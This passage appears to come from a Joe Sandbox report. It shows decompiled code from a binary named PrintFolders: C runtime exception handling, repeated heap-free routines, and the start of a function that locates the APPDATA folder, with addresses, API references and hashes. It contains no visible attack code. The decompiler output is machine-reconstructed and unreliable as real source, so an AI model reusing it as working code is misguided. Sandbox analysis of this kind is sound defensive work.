									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E00411D96(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E00411D96(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E00411D96(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E00411D96(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E0040FBBB(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00412092(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040FFF3(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E00411D96(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E00412B21(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E00411D96(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E00411D96(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00411D96(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E00411D96(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E00412B21(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E0041C70D(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E004127B5( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x44fb08) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E0040FFF3(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E0041279D( &_v64);
											E0041044B( &_v64, 0x43b934);
											L63:
											 *(E00411D96(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E00411D96(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E0040FDAE(_t279, _t319, _t274);
											E00412A21(_a8, _a16, _t305);
											_t235 = E00412BDE(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E00412998(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x00412112
0x00412119
0x0041211b
0x00412124
0x0041212a
0x00412132
0x00412134
0x00412137
0x0041213d
0x004124b6
0x004124b6
0x004124bb
0x004124bd
0x004124bf
0x004124c2
0x004124c3
0x004124c6
0x004124cc
0x004125eb
0x004124d2
0x004124d4
0x004124db
0x004124de
0x004124e1
0x004124e7
0x004124e9
0x004124ee
0x004124f1
0x004124f3
0x004124f9
0x004124fb
0x00412501
0x00412516
0x0041251b
0x0041251e
0x00412520
0x004125e7
0x00000000
0x004125e8
0x00412520
0x00412501
0x004124f9
0x004124f1
0x00412526
0x00412529
0x0041252c
0x0041252f
0x00412532
0x00412538
0x0041254a
0x0041254f
0x00412552
0x00412555
0x00412558
0x0041255b
0x0041255e
0x00412561
0x00000000
0x00000000
0x00412567
0x00412567
0x0041256a
0x0041256d
0x0041257c
0x0041257d
0x0041257d
0x0041257f
0x00412582
0x00000000
0x00000000
0x00412584
0x00412587
0x00000000
0x00000000
0x00412595
0x00412597
0x0041259a
0x0041259c
0x004125a4
0x004125a4
0x004125a7
0x004125a9
0x004125ab
0x004125c7
0x004125cc
0x004125cf
0x004125cf
0x00000000
0x004125a7
0x0041259e
0x004125a2
0x00000000
0x00000000
0x00000000
0x004125d2
0x004125d5
0x004125d6
0x004125d9
0x004125dc
0x004125df
0x004125e2
0x004125e2
0x00000000
0x0041256d
0x004125ec
0x004125f1
0x004125f2
0x004125f5
0x004125f8
0x004125f9
0x004125fa
0x004125fb
0x004125fe
0x00412600
0x00412678
0x0041267a
0x0041267a
0x00412602
0x00412602
0x00412605
0x00412608
0x00000000
0x0041260a
0x0041260a
0x0041260d
0x00412610
0x00412617
0x00412617
0x0041261a
0x0041261c
0x0041261e
0x00412650
0x00412650
0x00412653
0x0041265a
0x0041265a
0x0041265d
0x00412660
0x00412667
0x00412667
0x0041266a
0x00412671
0x00412673
0x00412673
0x0041266c
0x0041266c
0x0041266f
0x00000000
0x00000000
0x0041266f
0x00412662
0x00412662
0x00412665
0x00000000
0x00000000
0x00412665
0x00412655
0x00412655
0x00412658
0x00000000
0x00000000
0x00412658
0x00412674
0x00412620
0x00412620
0x00412620
0x00412623
0x00412623
0x00412625
0x00412627
0x00000000
0x00000000
0x00412629
0x0041262b
0x0041263f
0x0041263f
0x0041262d
0x0041262d
0x00412630
0x00412633
0x00000000
0x00412635
0x00412635
0x00412638
0x0041263b
0x0041263d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041263d
0x00412633
0x00412648
0x00412648
0x0041264a
0x00000000
0x0041264c
0x0041264c
0x0041264c
0x00000000
0x0041264a
0x00412643
0x00412645
0x00412645
0x00000000
0x00412645
0x00412612
0x00412612
0x00412615
0x00000000
0x00000000
0x00000000
0x00000000
0x00412615
0x00412610
0x00412608
0x0041267b
0x0041267f
0x0041267f
0x0041214c
0x0041214c
0x00412155
0x00412252
0x00412252
0x00412255
0x00000000
0x00412184
0x00412184
0x00412189
0x00000000
0x0041218f
0x0041218f
0x00412197
0x00412450
0x00412454
0x0041219d
0x004121a2
0x004121a5
0x004121aa
0x004121b1
0x004121b6
0x00000000
0x004121ee
0x004121f6
0x0041225a
0x0041225a
0x0041225d
0x00412260
0x00412262
0x00412265
0x00412268
0x0041226e
0x0041241f
0x0041241f
0x00412422
0x00000000
0x00412424
0x00412424
0x00412427
0x00000000
0x0041242d
0x0041242d
0x00412430
0x00412433
0x00412434
0x00412435
0x00412438
0x00412439
0x0041243c
0x0041243d
0x00412442
0x00000000
0x00412442
0x00412427
0x00412274
0x00412274
0x00412278
0x00000000
0x0041227e
0x0041227e
0x00412285
0x0041229d
0x0041229d
0x004122a0
0x004122a3
0x004122a9
0x004122b9
0x004122be
0x004122c1
0x004122c4
0x004122c7
0x004122ca
0x004122cd
0x004122d0
0x004122d6
0x004122d6
0x004122d9
0x004122dc
0x004122eb
0x004122ec
0x004122ec
0x004122ee
0x004122f1
0x004122f7
0x004122fa
0x00412300
0x00412302
0x00412305
0x00412308
0x00412311
0x00412314
0x00412316
0x00412316
0x00412319
0x0041231c
0x0041231f
0x00412322
0x00412325
0x0041232a
0x0041232b
0x0041232c
0x0041232d
0x0041232e
0x00412331
0x00412333
0x00412335
0x00000000
0x00412337
0x00412337
0x00412337
0x0041233a
0x0041233d
0x0041233f
0x00412340
0x00412345
0x00412348
0x0041234a
0x00000000
0x00000000
0x0041234c
0x0041234d
0x00412350
0x00412352
0x00000000
0x00412354
0x00412354
0x00412357
0x0041235a
0x00000000
0x0041235a
0x00000000
0x00412352
0x0041236e
0x00412374
0x00412391
0x00412396
0x00412396
0x00412399
0x00412399
0x00000000
0x0041235d
0x0041235d
0x0041235e
0x00412361
0x00412364
0x00412367
0x00412367
0x00000000
0x0041236c
0x00412308
0x004122fa
0x0041239c
0x0041239f
0x004123a0
0x004123a3
0x004123a6
0x004123a9
0x004123ac
0x004123ac
0x004123b5
0x004123b8
0x004123b8
0x004122d0
0x004123bb
0x004123bf
0x004123c1
0x004123c4
0x004123ca
0x004123ca
0x004123d2
0x004123d7
0x00412445
0x00412445
0x0041244a
0x0041244e
0x00000000
0x00000000
0x00000000
0x00000000
0x004123d9
0x004123d9
0x004123dd
0x004123ef
0x004123f2
0x004123f5
0x004123f7
0x0041240e
0x00412412
0x00412418
0x00412419
0x0041241b
0x00000000
0x0041241d
0x00000000
0x0041241d
0x004123f9
0x004123fe
0x00412401
0x00412406
0x00412409
0x00000000
0x00412409
0x004123df
0x004123e2
0x004123e5
0x004123e7
0x00000000
0x004123e9
0x004123e9
0x004123ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004123ed
0x004123e7
0x004123dd
0x00412287
0x00412287
0x0041228e
0x00000000
0x00412290
0x00412290
0x00412297
0x00000000
0x00000000
0x00000000
0x00000000
0x00412297
0x0041228e
0x00412285
0x00412278
0x004121f8
0x00412200
0x00412203
0x00412208
0x0041220c
0x0041220f
0x00412215
0x00412218
0x00000000
0x0041221a
0x0041221a
0x0041221d
0x0041221f
0x00412455
0x00412455
0x00000000
0x00412225
0x0041222d
0x00412238
0x00000000
0x00000000
0x00412241
0x00412244
0x00412245
0x00412248
0x0041224a
0x00000000
0x00412250
0x00000000
0x00412250
0x00000000
0x0041224a
0x00412225
0x0041245a
0x0041245a
0x0041245c
0x0041245d
0x00412464
0x00412467
0x00412475
0x0041247a
0x0041247f
0x00412482
0x00412487
0x0041248a
0x0041248d
0x0041248f
0x00412491
0x00412491
0x00412496
0x004124a2
0x004124a8
0x004124ad
0x004124b0
0x004124b1
0x00000000
0x004124b1
0x00412218
0x004121f6
0x004121b6
0x00412197
0x00412189
0x00412155

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0041220F
type_info::operator==.LIBVCRUNTIME ref: 00412231
___TypeMatch.LIBVCRUNTIME ref: 00412340
IsInExceptionSpec.LIBVCRUNTIME ref: 00412412
_UnwindNestedFrames.LIBCMT ref: 00412496
CallUnexpected.LIBVCRUNTIME ref: 004124B1

Strings

csm, xrefs: 004121BC
csm, xrefs: 00412268
csm, xrefs: 0041214F

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
Instruction ID: 21aa7bd5de75da7cd703e37400f2b4a3502758b12b2b00924095f405172d1fb9
Opcode Fuzzy Hash: d5dfb756700b109f77bad092a4cf65170d38a92c2de80a3b210a90049ee47108
Instruction Fuzzy Hash: 4CB1A031800219EFCF15DFA5DA819EEB7B5FF18314B10405BE914AB311D7B8EAA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10007A68 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10007A68(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x10010e70;
				if(_t68 != 0x10010e70) {
					E10008701(_t68);
					_t36 = _a4;
				}
				E10008701( *((intOrPtr*)(_t36 + 0x3c)));
				E10008701( *((intOrPtr*)(_a4 + 0x30)));
				E10008701( *((intOrPtr*)(_a4 + 0x34)));
				E10008701( *((intOrPtr*)(_a4 + 0x38)));
				E10008701( *((intOrPtr*)(_a4 + 0x28)));
				E10008701( *((intOrPtr*)(_a4 + 0x2c)));
				E10008701( *((intOrPtr*)(_a4 + 0x40)));
				E10008701( *((intOrPtr*)(_a4 + 0x44)));
				E10008701( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E10007894(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E100078FF(_t67, _t72, _t73, _t77);
			}

0x10007a68
0x10007a68
0x10007a68
0x10007a6d
0x10007a73
0x10007a75
0x10007a7b
0x10007a7e
0x10007a83
0x10007a86
0x10007a8a
0x10007a95
0x10007aa0
0x10007aab
0x10007ab6
0x10007ac1
0x10007acc
0x10007ad7
0x10007ae5
0x10007af0
0x10007af8
0x10007af9
0x10007afc
0x10007b02
0x10007b06
0x10007b0a
0x10007b0b
0x10007b15
0x10007b1b
0x10007b1c
0x10007b1f
0x10007b25
0x10007b29
0x10007b2d
0x10007b34

APIs

_free.LIBCMT ref: 10007A7E

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 10007A8A
_free.LIBCMT ref: 10007A95
_free.LIBCMT ref: 10007AA0
_free.LIBCMT ref: 10007AAB
_free.LIBCMT ref: 10007AB6
_free.LIBCMT ref: 10007AC1
_free.LIBCMT ref: 10007ACC
_free.LIBCMT ref: 10007AD7
_free.LIBCMT ref: 10007AE5

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
Instruction ID: 867ad9f989b00400d9638a76b2324434a93f572cdeb18d7cd5bb1e105d022b7d
Opcode Fuzzy Hash: 81c439588ecf3f878c2d47a34354f57c6a02997bda065798a73a88b2c9937e33
Instruction Fuzzy Hash: 8321957A914108EFDB41DF94C841DDE7BB9FF08384B6081A6F9599B125EA32EA448F90

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA4B Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041CA4B(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x431400;
				if(_t68 != 0x431400) {
					E0041E2B8(_t68);
					_t36 = _a4;
				}
				E0041E2B8( *((intOrPtr*)(_t36 + 0x3c)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x30)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x34)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x38)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x28)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x2c)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x40)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x44)));
				E0041E2B8( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0041C877(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0041C8E2(_t67, _t72, _t73, _t77);
			}

0x0041ca4b
0x0041ca4b
0x0041ca4b
0x0041ca50
0x0041ca56
0x0041ca58
0x0041ca5e
0x0041ca61
0x0041ca66
0x0041ca69
0x0041ca6d
0x0041ca78
0x0041ca83
0x0041ca8e
0x0041ca99
0x0041caa4
0x0041caaf
0x0041caba
0x0041cac8
0x0041cad3
0x0041cadb
0x0041cadc
0x0041cadf
0x0041cae5
0x0041cae9
0x0041caed
0x0041caee
0x0041caf8
0x0041cafe
0x0041caff
0x0041cb02
0x0041cb08
0x0041cb0c
0x0041cb10
0x0041cb17

APIs

_free.LIBCMT ref: 0041CA61

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0041CA6D
_free.LIBCMT ref: 0041CA78
_free.LIBCMT ref: 0041CA83
_free.LIBCMT ref: 0041CA8E
_free.LIBCMT ref: 0041CA99
_free.LIBCMT ref: 0041CAA4
_free.LIBCMT ref: 0041CAAF
_free.LIBCMT ref: 0041CABA
_free.LIBCMT ref: 0041CAC8

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction ID: 5b4a2eb99e861f4b6b1488fadc0f121773fdfa5924bf458925bca44d6de24a48
Opcode Fuzzy Hash: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction Fuzzy Hash: B021C076900108AFDB45EF96C891DDD7BB8BF08344F8041AAF5199B261D775DA84CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00440E98 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00440EAE
_free.LIBCMT ref: 00440EBA
_free.LIBCMT ref: 00440EC5
_free.LIBCMT ref: 00440ED0
_free.LIBCMT ref: 00440EDB
_free.LIBCMT ref: 00440EE6
_free.LIBCMT ref: 00440EF1
_free.LIBCMT ref: 00440EFC
_free.LIBCMT ref: 00440F07
_free.LIBCMT ref: 00440F15

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
Instruction ID: b5acc537e47175a484598864f7b5fa9eab7981bf784aec42cf186d38ae6ea6e0
Opcode Fuzzy Hash: db551eddc28ed9585e28f7d8a930085c69e0a83f508d5c587fb4fce91d87a741
Instruction Fuzzy Hash: 9821B67690010CBFDF41EF96C881DDE7BB8AF08344F0081AAF6159B121DB35EA958B88

Uniqueness

Uniqueness Score: -1.00%

Function 10001F90 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 342
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E10001F90(void** __ecx, void* __edi) {
				intOrPtr _v8;
				void* _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v300;
				char _v564;
				signed int _v568;
				void* _v572;
				void* _v588;
				char _v592;
				signed int _v596;
				void* _v600;
				char _v616;
				signed int _v620;
				char _v640;
				signed int _v676;
				signed int _v680;
				signed int _v692;
				void* _v960;
				void* _v964;
				signed int _v968;
				long _v972;
				intOrPtr _v976;
				signed int _v980;
				void* _v984;
				intOrPtr _v988;
				signed int _v1012;
				intOrPtr _v1020;
				char _v1024;
				void* _v1100;
				intOrPtr _v1116;
				void* _v1120;
				struct _PROCESS_INFORMATION _v1136;
				signed int _v1140;
				void* _v1144;
				signed int* _v1152;
				char _v1156;
				void* _v1160;
				void* _v1168;
				void* _v1172;
				long _v1188;
				intOrPtr _v1192;
				void* _v1196;
				void* _v1208;
				signed int _v1216;
				void* _v1220;
				void* _v1224;
				char _v1232;
				signed int _v1236;
				signed int _v1240;
				void* _v1244;
				void* _v1256;
				void* _v1268;
				void* _v1280;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t273;
				signed int _t274;
				char* _t276;
				signed int _t278;
				signed int _t280;
				intOrPtr* _t282;
				signed int _t295;
				signed int _t297;
				intOrPtr* _t299;
				void* _t307;
				signed int _t312;
				char _t318;
				signed int _t320;
				signed int _t321;
				signed int _t327;
				signed int* _t329;
				signed int _t334;
				unsigned int _t361;
				void* _t362;
				signed int _t363;
				signed int _t369;
				signed int _t372;
				signed int _t374;
				void* _t375;
				signed int _t376;
				signed int _t377;
				char* _t379;
				void* _t385;
				signed int _t386;
				signed int _t387;
				long _t388;
				intOrPtr _t395;
				CHAR* _t397;
				signed int _t400;
				void* _t404;
				intOrPtr _t413;
				signed int _t418;
				signed int _t422;
				signed int _t426;
				void* _t427;
				signed int _t429;
				char _t436;
				intOrPtr _t438;
				intOrPtr _t443;
				intOrPtr _t452;
				intOrPtr _t454;
				intOrPtr _t459;
				intOrPtr _t468;
				void* _t470;
				void* _t471;
				signed int _t473;
				void** _t475;
				intOrPtr* _t481;
				signed int _t482;
				char _t487;
				intOrPtr* _t493;
				signed int _t494;
				char _t499;
				signed int* _t506;
				signed int _t508;
				void* _t509;
				signed int _t514;
				signed int _t515;
				void* _t520;
				char* _t524;
				intOrPtr _t525;
				signed int _t531;
				signed int _t532;
				void* _t535;
				intOrPtr _t536;
				signed int _t537;
				void* _t538;
				intOrPtr _t540;
				intOrPtr _t541;
				intOrPtr* _t542;
				intOrPtr _t544;
				intOrPtr _t545;
				intOrPtr* _t546;
				intOrPtr* _t548;
				intOrPtr* _t551;
				signed int _t552;
				signed int _t553;
				intOrPtr* _t554;
				intOrPtr* _t557;
				signed int _t558;
				signed int _t560;
				signed int _t565;
				intOrPtr _t566;
				void* _t567;
				void* _t568;
				void* _t569;
				void* _t570;
				char _t571;
				void* _t572;
				void* _t573;
				void* _t574;
				void* _t575;
				void** _t577;
				void* _t578;
				signed int _t579;
				void* _t580;
				signed int _t581;
				signed int _t583;
				char _t584;
				signed int _t587;
				void* _t589;
				void* _t590;
				void* _t591;
				void* _t592;
				void* _t593;
				signed int _t594;
				void* _t595;
				void* _t596;
				signed int* _t597;
				char* _t599;
				void* _t603;
				signed int _t604;
				void* _t605;
				void* _t606;
				signed int _t608;
				signed int _t610;
				void* _t612;
				void* _t614;
				void* _t618;
				signed int _t621;
				void* _t622;
				signed int _t623;
				signed int _t628;
				void* _t633;
				void* _t638;

				_t471 = _t618;
				_t621 = (_t618 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t471 + 4));
				_t608 = _t621;
				_t622 = _t621 - 0x268;
				_t273 =  *0x10017004; // 0x79eab102
				_t274 = _t273 ^ _t608;
				_v32 = _t274;
				 *[fs:0x0] =  &_v24;
				_t577 = __ecx;
				_v592 = __ecx;
				_v588 = 0;
				_v592 = __ecx;
				_v572 = 0;
				_v568 = 0xf;
				_v588 = 0;
				_t276 =  &_v300;
				_v16 = 0;
				__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t276, _t274, __edi, _t589, _t471,  *[fs:0x0], E1000F83C, 0xffffffff, _t606, _t470);
				if(_t276 < 0) {
					_t548 = E100065B3(_t471, __ecx, _t589, __eflags, "APPDATA");
					_t622 = _t622 + 4;
					_t481 = _t548;
					_t16 = _t481 + 1; // 0x1
					_t590 = _t16;
					do {
						_t278 =  *_t481;
						_t481 = _t481 + 1;
						__eflags = _t278;
					} while (_t278 != 0);
					_t482 = _t481 - _t590;
					__eflags = _t482;
					_push(_t482);
					_push(_t548);
				} else {
					_t546 =  &_v300;
					_t575 = _t546 + 1;
					goto L2;
					L2:
					_t468 =  *_t546;
